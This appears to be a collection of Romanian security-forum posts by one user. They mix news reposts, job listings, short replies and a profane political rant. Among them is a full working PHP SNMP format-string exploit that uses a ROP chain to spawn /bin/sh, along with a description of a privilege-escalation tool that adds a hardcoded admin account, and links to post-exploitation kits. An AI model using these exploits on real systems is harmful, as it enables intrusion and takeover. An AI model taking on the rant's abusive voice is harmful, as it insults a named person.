Nytro

Asa cu "A" - este 65 sau 0x41 (caracterul cu codul ASCII 65). Asa NULL byte este 0 sau 0x00 (caracterul cu codul ASCII 0). http://www.asciitable.com/ La ce te referi mai exact?

Da, un frumos raport de pentest

VIDEO: DEBLOCAREA UNEI ÎNCUIETORI CU AGRAFE DE PĂR Petru Stratulat | 15/04/2016 Am vazut cu totii filme in care usile erau accesate cu usurinta folosind doar doua agrafe de par, dar cum e posibil asa ceva? Tutorialul de mai jos te invata sa faci ca cei din filme, desi noi nu incurajam asemenea actiuni. Enjoy! Via: http://soundofscience.info/video-deblocarea-unei-incuietori/

Curtea Europeană: postarea de link-uri către conţinut piratat găzduit pe alte website-uri publice este legală Aurelian Mihai - 8 apr 2016 După ce în anul 2014 Curtea Europeană de Justiţie a anunţat că nu consideră postarea de link-ujri către conţinut găzduit pe alte website-uri publice ca fiind o încălcare a drepturilor de autor, Avocatul General al Curţii Europene vine cu completări ce vor face deliciul amatorilor de conţinut piratat. Potrivit acestuia, postarea de link-uri către alte website-uri publice nu constituie o încălcare a legii chiar dacă respectivul conţinut este găzduit fără permisiunea expresă a posesorului drepturilor de autor. Punctul de vedere al Curţii Europene a fost deja pus în discuţie într-un tribunal olandez, la procesul dus între un blog local numit GeenStijl şi publicaţia Playboy, vizând acuzaţii pentru postarea unor link-uri directe către un serviciu de file-sharing unde erau găzduite albume foto piratate aparţinând Playboy. Chiar dacă solicitarea pentru îndepărtarea conţinutului protejat a fost respectată de proprietarii serviciului de file sharing, proprietarul blogului a postat imediat link-uri actualizate către aceleaşi albume foto, găzduite însă pe un alt website. Încercarea de a forţa pe cale legală îndepărtarea link-urilor către conţinutul piratat s-a lovit însă de poziţia Avocatului General al Curţii Europene: „Hyperlink-urile care duc, chiar şi direct, către opere protejate nu le fac disponibile publicului când acestea sunt deja liber accesibile pe un alt website, ci doar servesc la facilitarea descoperirii lor”. Trebuie spus că poziţia avocatului Melchior Wathelet nu are putere de lege, decizia finală pe această temă urmând să fie luată în cursul acestui an, opinia Avocatului General cântărind însă puternic în interpretarea legilor UE. Sursa: http://www.go4it.ro/internet/curtea-europeana-postarea-de-link-uri-catre-continut-piratat-gazduit-pe-alte-website-uri-publice-este-legala-15220754/

De ce e "much better than Beef"? Pare sa faca cam aceleasi lucruri, doar ca un Gigel o sa aiba si el acces la acele persoane.

Da, e ciudata miscarea asta a lor, poate vor ca userii sa aiba mai multa incredere in serviciile lor. Astept primul raport pe a analiza a acestei "end-to end encryption".

Ceva interesant pe acolo? Face cineva un rezumat?

EXPLOITING BUFFER OVERFLOWS ON MIPS ARCHITECTURES A Walkthrough by Lyon Yang @l0Op3r Editing and Support: Bernhard Mueller Table of Contents 1. Introduction............................................................................................................. 3 2. Triggering and Debugging the Exploit....................................................................... 3 3. Cache Incoherency ................................................................................................... 7 4. Overcoming ASLR..................................................................................................... 8 5. Using ROP Gadgets .................................................................................................. 9 6. Writing the exploit – Calculating Offsets ................................................................ 14 7. Writing the exploit – Writing the MIPS Shellcode Encoder ..................................... 17 8. Writing the exploit – fork() Shellcode..................................................................... 22 Download: https://www.exploit-db.com/docs/39658.pdf

PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit <?php // PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit) // By Andrew Kramer <andrew at jmpesp dot org> // Should bypass ASLR/NX just fine // This exploit utilizes PHP's internal "%Z" (zval) // format specifier in order to achieve code-execution. // We fake an object-type zval in memory and then bounce // through it carefully. First though, we use the same // bug to leak a pointer to the string itself. We can // then edit the global variable with correct pointers // before hitting it a second time to get EIP. This // makes it super reliable! Like... 100%. // To my knowledge this hasn't really been done before, but // credit to Stefan Esser (@i0n1c) for the original idea. It works! // https://twitter.com/i0n1c/status/664706994478161920 // All the ROP gadgets are from a binary I compiled myself. // If you want to use this yourself, you'll probably need // to build a new ROP chain and find new stack pivots for // whatever binary you're targeting. If you just want to get // EIP, change $stack_pivot_1 to 0x41414141 below. // pass-by-reference here so we keep things tidy function trigger(&$format_string) { $session = new SNMP(SNMP::VERSION_3, "127.0.0.1", "public"); // you MUST set exceptions_enabled in order to trigger this $session->exceptions_enabled = SNMP::ERRNO_ANY; try { $session->get($format_string); } catch (SNMPException $e) { return $e->getMessage(); } } // overwrite either $payload_{1,2} with $str at $offset function overwrite($which, $str, $offset) { // these need to be global so PHP doesn't just copy them global $payload_1, $payload_2; // we MUST copy byte-by-byte so PHP doesn't realloc for($c=; $c<strlen($str); $c++) { switch($which) { case 1: $payload_1[$offset + $c] = $str[$c]; break; case 2: $payload_2[$offset + $c] = $str[$c]; break; } } } echo "> Setting up payloads\n"; //$stack_pivot_1 = pack("L", 0x41414141); // Just get EIP, no exploit $stack_pivot_1 = pack("L", 0x0807c19f); // xchg esp ebx $stack_pivot_2 = pack("L", 0x0809740e); // add esp, 0x14 // this is used at first to leak the pointer to $payload_1 $leak_str = str_repeat("%d", 13) . $stack_pivot_2 . "Xw00t%lxw00t"; $trampoline_offset = strlen($leak_str); // used to leak a pointer and also to store ROP chain $payload_1 = $leak_str . // leak a pointer "XXXX" . // will be overwritten later $stack_pivot_1 . // initial EIP (rop start) // ROP: execve('/bin/sh',0,0) pack("L", 0x080f0bb7) . // xor ecx, ecx; mov eax, ecx pack("L", 0x0814491f) . // xchg edx, eax pack("L", 0x0806266d) . // pop ebx pack("L", 0x084891fd) . // pointer to /bin/sh pack("L", 0x0807114c) . // pop eax pack("L", 0xfffffff5) . // -11 pack("L", 0x081818de) . // neg eax pack("L", 0x081b5faa); // int 0x80 // used to trigger the exploit once we've patched everything $payload_2 = "XXXX" . // will be overwritten later "XXXX" . // just padding, whatevs "\x08X" . // zval type OBJECT str_repeat("%d", 13) . "%Z"; // trigger the exploit // leak a pointer echo "> Attempting to leak a pointer\n"; $data = trigger($payload_1); $trampoline_ptr = (int)hexdec((explode("w00t", $data)[1])) + $trampoline_offset; echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n"; // If there are any null bytes or percent signs in the pointer, it will break // the -0x10 will be applied later, so do it now too if(strpos(pack("L", $trampoline_ptr - 0x10), "\x00") !== false || strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) { echo "> That pointer has a bad character in it\n"; echo "> This won't work. Bailing out... :(\n"; exit(); } echo "> Overwriting payload with calculated offsets\n"; // prepare the trampoline // code looks kinda like... // mov eax, [eax+0x10] // mov eax, [eax+0x54] // call eax overwrite(2, pack("L", $trampoline_ptr - 0x10), ); overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset); // exploit echo "> Attempting to pop a shell\n"; trigger($payload_2); // if we make it here, something didn't work echo "> Exploit failed :(\n"; Sursa: https://www.exploit-db.com/exploits/39645/

Job-urile disponibile la inceputul lunii aprilie: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4376842 Cateva job-uri selectate: Penetration Testing Consultant - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/principal-consultant-penetration-testing-75285 Network Engineer - Telecom - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineer-telecom-85891 Information Security Specialist - Rotating Shifts - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-specialist-rotating-shifts-80306 Desktop Support Analyst - Rotating Shifts - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/desktop-support-analyst-rotating-shifts-82324 Firewall Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-engineer-81902 Windows System Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-82417 .NET Software Development Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/.net-software-development-advisor-83641 Java Software Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-developer-82960 Senior Java Software Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-java-software-developer-82976 Senior Virtualization Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senio-virtualization-administor-83424 Back-Up and Recovery Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/back-up-and-recovery-administrator-83426 Junior .NET Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-.net-developer-84945 IT Project Manager - Software - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/it-project-manager-software-85560 .NET Software Development Sr. Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/.net-software-development-sr.-advisor-86039 Local IT Support - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/deskside-technician-85137 Network Engineering Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineering-specialist-85077 Endpoint Security Advisor Encryption - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/endpoint-security-advisor-encryption-84579 Technical Support Supervisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-supervisor-85867 IDS Support Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/ids-support-engineer-83942 Firewall Support Sr. Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-support-sr-engineer-83948 Vulnerability Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-specialist-85444 Daca aveti vreo intrebare, astept un mesaj privat. Daca e cineva interesat de postul de Penetration Tester, va pot oferi mai multe detalii, sunt mai multe posturi disponibile.

Ce? Esti sigur ca nu ai baut prea mult?

Aveti idee ce face mai exact acest vaccin?

E facut in C# (asa pare), nici malware-ul in ziua de azi nu mai e ce era odata...

Ciolos e un prost. Cica "cartele romanesti PrePay au fost folosite pentru atentate". Sa ne suga pula, pana si SRI-ul a spus ca "sunt active pe terirorii de conflict bla bla" dar nu a zis nimic legat de asa ceva, o fi o Mama Omida Ciolos asta, iar publicul il crede... In plus, sunt mai multe tari care permit cumpararea de cartele fara buletin decat cele care nu permit in Europa. El zicea ca "majoritatea nu permit fara buletin", deci iar sa ne suga pula. Apoi, interzici in Romania, dar nu sunt interzise in alte 20 de tari. Ce se previne cu asta? Nimic. Serviciile pulii nu au destui bani si se folosesc de atentate ca sa manipuleze opinia publica, sa ii transforme in sclavi. Si inca ceva, se vand la negru arme si lansatoare de rachete, oare nu o sa se poata vinde niste cartele? ”Am sunat azi la parchetul din Bruxelles să întreb dacă există vreo informație în legătură cu numerele de telefon prepay românești folosite de teroriști. Așa a zis premierul Dacian Cioloș: — "Au fost folosite cartele prepay din România pentru pregătirea de atentate în UE." La parchet (am si o antenã firavã acolo), după ce s-au lămurit că nu e vorba de Armenia, ci de România (lumea pe-aici stã prost cu geografia), mi s-a confirmat (spre ușurarea mea) că nu, nici unul din teroriști nu avea telefon prepay de România. La fel și la Paris, unde am căutat să aflu și mai viclean. Nada, nimeni. Doar telefoane franceze și belgiene." Dan Alexe, corespondent Europa Liberă, Bruxelles.

TempRacer – Windows Privilege Escalation Tool March 29, 2016 TempRacer is a Windows Privilege Escalation Tool written in C# designed to automate the process of injecting user creation commands into batch files with administrator level privileges. The code itself is not using that many resources because it relies on callbacks from the OS. You can keep it running for the the whole day to try and catch the creation of an admin level batch file. It’s especially useful (and very successful) in environments where automated patching systems like BigFix are running. If you are able to trigger updates or new software installs you should give it a try. If successful it will inject the code to add the user “alex” with password “Hack123123” and add him to the local administrator group. It will also block the file for further changes, so the privilege escalation code stays inside. You can also find some Windows Privilege Escalation Tools in: PowerSploit – A PowerShell Post-Exploitation Framework And if you want to scan for privilege issues or misconfiguration, use this – windows-privesc-check – Windows Privilege Escalation Scanner You can download tempracer here: – TempRacer.exe – tempracer-1.zip (Source) Or read more here. Sursa: http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/

PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. Live Online Copy: You can find a copy of the project online at: http://pwnwiki.io Offline Use: Clone the repository or pull the archive (download zip) of the repo Open index.html Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use Mongoose Tiny or HFS to host the files locally. On OSX and Linux python -m SimpleHTTPServer seems to work just fine. Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS)

A Penetration Testing Framework , The Hacker's Repo our hope is in the last version we will have evry script that a hacker needs THIS TOOL IS ONLY FOR EDUCATIONAL PURPOSES ONLY Requirements Python 2 sudoer Link: https://github.com/x3omdax/PenBox

USB Thief, the new USB-based data stealing Trojan March 29, 2016 By Pierluigi Paganini USB Thief, the new USB-based data-stealing Trojan discovered by ESET that relies on USB devices in order to spread itself and infect also air-gapped systems Security researchers at ESET have discovered a new insidious data-stealer, dubbed USB Thief (Win32/PSW.Stealer.NAI), that relies on USB devices in order to spread itself. USB Thief is able to infect air-gapped or isolated systems does not leave any trace of activity on the infected systems. Malware authors have implemented special techniques mechanisms to protect USB Thief from being detected and analyzed. The authors also implemented an advanced multi-staged encryption process to protect the Trojan. “The USB Thief is, in many aspects different from the more common malware types that we’re used to seeing flooding the internet,” wrote Tomáš Gardoň, a malware analyst at ESET. “This one uses only USB devices for propagation, and it does not leave any evidence on the compromised computer. Its creators also employ special mechanisms to protect the malware from being reproduced or copied, which makes it even harder to detect and analyze. The USB Thief Trojan malware can be stored either as a Dynamically Linked Library (DLL) used by the portable applications or as a portable application’s plugin source. Mobile devices are usually used to store portable version of common applications like Firefox, TrueCrypt, and Notepad++. When victims launch the portable application the USB Thief runs in the background. “Unfortunately, this is not the case with the USB Thief as it uses an uncommon way to trick a user – it benefits from the fact that USB devices often store portable versions of some common applications like Firefox portable, Notepad++ portable, TrueCrypt portable and so on.” continues the post. The malware completely resides on the USB device, it doesn’t leave any trace of its presence. According to the experts at the ESET any tool that could be used to breach an air-gapped network must be taken into account. “Well, taking into account that organizations isolate some of their systems for a good reason,” said Peter Stancik, the security evangelist at ESET. “Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous.” “People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy.” How can organizations prevent attacks based on USB Thief from succeeding? Do not use USB storage devices from sources that may not be trustworthy. Disable USB ports wherever possible. Define strict policies to enforce care in the use of USB devices. Train the staff on cyber threats. Pierluigi Paganini Sursa: http://securityaffairs.co/wordpress/45741/malware/usb-thief-trojan.html

Life After the Isolated Heap Posted by Natalie Silvanovich, Mourner of Lost Exploits Over the past few months, Adobe has introduced a number of changes to the Flash Player heap with the goal of reducing the exploitability of certain types of vulnerabilities in Flash, especially use-after-frees. I wrote an exploit involving two bugs discovered after the Isolated Heap was implemented to explore how it impacts their exploitability. The Isolated Heap The Flash heap, MMgc, is a garbage collected heap that also supports unmanaged fixed allocations. In the past, there have been many exploits in the wild that used certain properties of the heap to aid exploitation. In particular, many exploits used the allocation properties of Vectors to gain read/write access to the entire Flash memory space via heap memory corruption bugs. Exploits that use other object types, such as ByteArray and BitmapData have also been seen in the wild. MMgc was originally implemented as a type and size bucketed allocator. When memory is requested, the allocator that is called depends on the type of memory that is needed. This is related to the garbage collection properties of the memory. If it is not garbage collected, the Fixed allocator is used, otherwise the Garbage-Collected (GC) allocator is used. Within the GC allocator, there are about eight subtypes of memory that can be allocated, related to whether the memory contains pointers and whether those pointers have custom finalizers or GC routines that need to be called. Within each type, the request is sorted by size, and the memory is allocated on a heap page for that size. Large requests are allocated on their own page. The Isolated Heap introduces partitioning to the heap, essentially a third factor which determines where memory is allocated. There is separate memory for each partition, which is then split into subsections for different types and sizes. The goal of partitioning is to allocate objects that are likely to contain memory corruption bugs in a different area of memory than objects that are likely to be useful in exploiting memory corruption bugs, and generally add more entropy to the heap. There are currently three partitions on the heap. The first partition is generally used for objects that contain pointers: script objects, their backing GC-memory and certain pointer arrays. The second partition is used for objects that contain non-pointer data, mostly arrays of primitive types. The third partition is used for a small number of objects that have a history of being used in exploits. These are typically variable-sized data buffer objects. Outside of the Isolated Heap, checksumming has also been implemented to detect and abort if certain sensitive objects are ever altered. Articol complet: http://googleprojectzero.blogspot.ro/2016/03/life-after-isolated-heap.html?spref=tw

Adobe Flash - Object.unwatch Use-After-Free Exploit Sources: https://bugs.chromium.org/p/project-zero/issues/detail?id=716 https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes. This issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is: var o = {}; o.unwatch(); The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is: void* args = alloca( args_size ); for( int i = 0; i < args_size; i++){ // Init args } if ( ((int) args[0]) & 6 == 6 ) args[0] = call_toString( args[0] ); if ( args_size < 1) exit(); Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39631.zip Sursa: https://www.exploit-db.com/exploits/39631/

O sa pun noul index dupa ce repara @Gecko problemele. Am pus 2 plugin-uri: 1. O sa primiti avertisment daca ultimul post intr-un topic este mai vechi de 60 de zile (dar tot veti putea posta) 2. RSS feed pe anumite forumuri: https://rstforums.com/forum/rssalltopics.xml Va rog sa testati, sper sa fie ok acel RSS.

Daca nu e un MS08-067 - autorul sa ne suga pula.

Lucrez, are o problema, @Gecko ce ai facut?

Am facut update la ultima version de IPBoard. Ce e nou: https://invisionpower.com/release-notes/ O sa ma ocup si de alte probleme cand o sa am timp.